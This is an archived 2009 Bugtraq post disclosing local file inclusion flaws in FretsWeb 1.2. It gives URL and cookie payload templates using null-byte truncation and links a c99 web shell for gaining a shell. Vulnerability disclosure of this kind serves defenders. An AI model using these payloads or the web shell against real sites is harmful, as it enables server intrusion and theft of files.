lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20090621190447.28435.qmail@securityfocus.com>
Date: 21 Jun 2009 19:04:47 -0000
From: ceza_fuat_kolik@...mail.com
To: bugtraq@...urityfocus.com
Subject: FretsWeb 1.2 Multiple Local File Inclusion Vulnerabilities

----------------------------------------------------------------------------------------------
|       	   	    MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES         	     |
|--------------------------------------------------------------------------------------------|
|                                    |      FretsWeb 1.2      |		    	             |
|  CMS INFORMATION:          	      ------------------------	               	             |
|  Author :  xhaxkerx
|  Special Thankz : yasin
|  Site : http://www.c99.mobi										             |
|-->WEB: http://sourceforge.net/projects/fretsweb/			       		     |
|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/		                             |
|-->DEMO: N/A										     |
|-->CATEGORY: CMS / Games/Entertainment							     |
|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It...              |
|		is an improved version of FoFCS.It is meant for...          		     |
|-->RELEASED: 2009-05-30								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|-->TESTED ON: firefox 3						                     |
|-->DORK: N/A									             |
|-->CATEGORY: LOCAL FILE INCLUSION (LFI) / INSECURE COOKIE HANDLING (LFI)	             |
|-->AFFECT VERSION: CURRENT (MAYBE <= ?)				 		     |
|-->Discovered Bug date: 2009-06-02							     |
|-->Reported Bug date: 2009-06-02							     |
|-->Fixed bug date: 2009-06-14								     |
|-->Info patch: http://sourceforge.net/projects/fretsweb/				     |
|-->WEB/BLOG: N/A									     |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------



Note: Of course use null byte (%00) when you want to include a file with different extension to "php"



###########################
///////////////////////////

LOCAL FILE INCLUSION (LFI):

///////////////////////////
###########################



<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>



[++] GET var --> 'language'



~~~> http://[HOST]/[PATH]/charts.php?language=[LFI]%00



###############################
///////////////////////////////

INSECURE COOKIE HANDLING (LFI):

///////////////////////////////
###############################


# if you need shell http://www.c99.mobi/c99.txt


[++] Cookie --> 'fretsweb_language'



~~~> fretsweb_language=[LFI]%00



<<<-----------------------------EOF---------------------------------->>>ENJOY IT!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ